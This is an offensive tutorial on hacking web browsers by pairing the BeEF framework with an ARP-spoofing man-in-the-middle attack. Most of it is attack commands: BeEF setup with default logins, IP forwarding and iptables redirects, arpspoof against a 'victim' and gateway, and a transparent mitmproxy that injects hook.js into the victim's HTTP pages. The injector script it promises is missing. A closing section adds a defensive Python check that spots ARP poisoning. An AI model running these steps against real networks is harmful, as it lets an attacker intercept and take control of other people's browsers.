In this article, I will demonstrate how the Browser Exploitation Framework (BeEF) can be used together with a man-in-the-middle (MITM) attack to hack web browsers.
What is BeEF?
What is Man In The Middle Attack?
A man-in-the-middle attack is where an attacker places himself between you and your router using a technique known as ARP spoofing.
By doing so, all your Internet traffic is routed through the attacker's machine (the "man in the middle") instead of going directly to your router. This gives the attacker an advantage because he/she can now see and even modify your Internet traffic (both incoming and outgoing) as they want. This is obviously only valid for websites that don't use a secure HTTPS connection. Since HTTPS provides authenticity and encryption, a man-in-the-middle attack won't work on HTTPS websites.
Combining BeEF and Man In The Middle Attack
The idea is simple: we want to modify the victim's Internet traffic so that the "hook.js" file is injected into each website response before it is sent on to him/her. In this way, BeEF can control all the websites that the victim is using in his/her browser.
Step 1. Install BeEF
BeEF comes pre-installed with Kali Linux, but if you want to install it manually you can do so with:
sudo apt-get install beef-xss
Step 2. Run BeEF
You can start the BeEF framework by typing this command
This will start BeEF and serve a web interface at http://<IP>:3000/ui
Go to this URL and log in with the default credentials (username: beef, password: beef).
Now you can see the BeEF control panel.
Step 3. Start the Man In The Middle Attack
In order to start the MITM attack, you first need to enable IP forwarding on your Kali Linux machine:
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -A FORWARD --in-interface [iface] -j ACCEPT
sudo iptables -t nat -A PREROUTING -i [iface] -p tcp --dport 80 -j REDIRECT --to-port 8080
Replace [iface] with your interface in the above commands. You can find out your interface name by typing "ifconfig" in your terminal.
Next, you need to install the arpspoof utility.
sudo apt-get install dsniff
Then, start the ARP spoofing with the arpspoof utility.
In the first terminal, run
arpspoof -i [iface] -t [victim-ip] [gateway-ip]
[victim-ip] should be the IP address of the victim, and [gateway-ip] is the IP address of your router (you can find it by typing "ip route" in your terminal).
In your second terminal, run
arpspoof -i [iface] -t [gateway-ip] [victim-ip]
The man in the middle is now set up. All the victim's Internet traffic on port 80 is routed through our machine. But in order to monitor or modify the traffic, we need to use a proxy tool. We'll be using a tool called "mitmproxy".
First, install it:
sudo apt-get install mitmproxy
pip install mitmproxy
Before we start the proxy tool, we need to write a Python utility that will automatically inject the "hook.js" file into every response message captured by the proxy tool.
Here is the Python script that does it:
Replace the IP address 0.0.0.0 with your IP address (where BeEF is running).
Now, start the proxy tool by giving this Python script as input.
mitmdump --mode transparent -s js_injector.py
This will start the proxy tool, and for every response it captures, it will execute the Python script that is passed as input, which in turn will inject the "hook.js" file into the message.
That's it! Now, all the websites that work on plain HTTP are injected with the hook.js file and you can control all of them using the BeEF control panel.
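Seen from the victim's side, the ARP spoofing in Step 3 leaves a trace: the gateway IP now resolves to the attacker's MAC address, and if the attacker's own IP is also cached, both IPs share one MAC. The following check over `ip neigh show` output is an added example, not part of the original article; the sample table, the addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output on a host whose ARP cache has
# been poisoned: the gateway (192.168.1.1) and another host (192.168.1.66)
# resolve to the same MAC address. All addresses are made up for illustration.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.66 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.1.20 dev eth0 lladdr 3c:52:82:11:22:33 REACHABLE
192.168.1.30 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+(?P<dev>\S+)\s+"
    r"lladdr\s+(?P<mac>[0-9a-fA-F:]{17})\b"
)

def parse_neigh(text):
    """Return {ip: mac} for IPv4 entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_arp_anomalies(table, gateway_ip, known_gateway_mac=None):
    """Flag signs of ARP cache poisoning in a parsed neighbour table."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    gw_mac = table.get(gateway_ip)
    # 1. Gateway MAC differs from a baseline recorded on a trusted network.
    if known_gateway_mac and gw_mac and gw_mac != known_gateway_mac.lower():
        findings.append(("gateway_mac_changed", gateway_ip, gw_mac))
    # 2. One MAC answering for several IPs; most serious when the gateway
    #    is one of them, since that host then sits in the traffic path.
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            kind = "gateway_mac_shared" if gateway_ip in ips else "duplicate_mac"
            findings.append((kind, tuple(sorted(ips)), mac))
    return findings

if __name__ == "__main__":
    for f in find_arp_anomalies(parse_neigh(SAMPLE_NEIGH), "192.168.1.1",
                                known_gateway_mac="a4:2b:b0:de:ad:01"):
        print(f)
```

On a real host, feed `parse_neigh` the output of `ip neigh show` and pass a gateway MAC recorded while the network was known to be clean.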